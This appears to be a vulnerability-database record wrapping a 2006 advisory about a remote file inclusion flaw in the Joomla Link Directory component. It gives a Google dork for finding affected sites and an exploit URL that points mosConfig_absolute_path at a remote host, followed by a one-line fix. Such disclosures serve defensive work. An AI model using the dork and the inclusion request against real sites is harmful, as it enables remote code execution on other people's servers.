DATABASE RESOURCES PRICING ABOUT US

{"id": "1337DAY-ID-713", "type": "zdt", "bulletinFamily": "exploit", "title": "Joomla Link Directory Component <= 1.0.3 Remote Include Vulnerability", "description": "Exploit for unknown platform in category web applications", "published": "2006-08-18T00:00:00", "modified": "2006-08-18T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/713", "reporter": "camino", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-07T23:42:05", "viewCount": 59, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://0day.today/exploit/713", "sourceData": "=====================================================================\r\nJoomla Link Directory Component <= 1.0.3 Remote Include Vulnerability\r\n=====================================================================\r\n\r\n\r\n\r\n .:[ insecurity research team ]:.\r\n .__..____.:.______.____.:.____ .\r\n .:. | |/ \\:/ ___// __ \\:/ _\\.:.\r\n : | | | \\\\____\\\\ ___/\\ /__ :. .\r\n ..: |__|___| /____ >\\___ >\\___ >.:\r\n .:.. .. .\\/ .:\\/:. .\\/. .:\\/:\r\n . ...:. .advisory. .:...\r\n :..................: 18.o8.2oo6 ..\r\n \r\n \r\n Affected Application: Link Directory <= v1.0.3\r\n\r\n (Mambo/Joomla CMS Component)\r\n \r\n \r\n . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\r\n \r\n \r\n Discoverd by: camino\r\n \r\n Team: Insecurity Research Team\r\n \r\n \r\n \r\n \r\n . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .\r\n \r\n \r\n Typ: Remote [x] Local [ ]\r\n \r\n Remote File Inclusion [x] SQL Injection [ ]\r\n \r\n Level: Low [ ] Middle [x] High [ ]\r\n \r\n Application: Link Directory\r\n \r\n Version: <= 1.0.3\r\n \r\n Vulnerable File: toolbar.linkdirectory.html.php\r\n \r\n URL: http://www.sonerekici.com\r\n \r\n Description: It's a component to publish links.\r\n \r\n Dork: inurl:\"com_linkdirectory\"\r\n \r\n \r\n \r\n . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .\r\n\r\n\r\n http://[sitepath]/[joomlapath]/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://huh?\r\n \r\n . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .\r\n \r\n \r\n o1.) open toolbar.linkdirectory.html.php\r\n \r\n o2.) add this after line 8:\r\n\r\n defined( '_VALID_MOS' ) or \r\n\r\n die( 'Direct Access to this location is not allowed.' );\r\n\r\n o3.) done!\r\n\r\n\r\n\r\n . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .\r\n \r\n \r\n my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-07] #", "_state": {"dependencies": 1645364325, "score": 1659766679, "epss": 1678811959}}

{}